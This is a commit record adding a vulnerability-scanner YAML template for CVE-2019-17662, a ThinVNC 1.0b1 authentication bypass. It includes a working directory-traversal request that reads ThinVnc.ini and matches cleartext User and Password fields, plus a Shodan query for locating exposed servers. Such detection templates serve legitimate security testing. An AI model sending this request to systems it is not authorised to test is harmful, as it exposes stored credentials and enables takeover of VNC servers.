Merge pull request #8067 from projectdiscovery/CVE-2019-17662

Create CVE-2019-17662.yaml
2023-08-24 07:56:20 +05:30 · 2023-08-24 07:56:20 +05:30 · 6841680597
parent fca4829c6c 1dfac958d8
commit 6841680597
1 changed files with 45 additions and 0 deletions
--- a/http/cves/2019/CVE-2019-17662.yaml
+++ b/http/cves/2019/CVE-2019-17662.yaml
@ -0,0 +1,45 @@
+id: CVE-2019-17662
+
+info:
+  name: ThinVNC 1.0b1 - Authentication Bypass
+  author: DhiyaneshDK
+  severity: critical
+  description: |
+    ThinVNC 1.0b1 is vulnerable to arbitrary file read, which leads to a compromise of the VNC server. The vulnerability exists even when authentication is turned on during the deployment of the VNC server. The password for authentication is stored in cleartext in a file that can be read via a ../../ThinVnc.ini directory traversal attack vector.
+  reference:
+    - http://packetstormsecurity.com/files/154896/ThinVNC-1.0b1-Authentication-Bypass.html
+    - https://github.com/bewest/thinvnc/issues/5
+    - https://redteamzone.com/ThinVNC/
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cwe-id: CWE-522,CWE-22
+  metadata:
+    max-request: 1
+    shodan-query: http.favicon.hash:-1414548363
+    verified: true
+  tags: cve,cve2019,auth-bypass,thinvnc
+
+http:
+  - raw:
+      - |
+        GET /{{randstr}}/../../ThinVnc.ini HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "User="
+          - "Password="
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - "application/binary"
+
+      - type: status
+        status:
+          - 200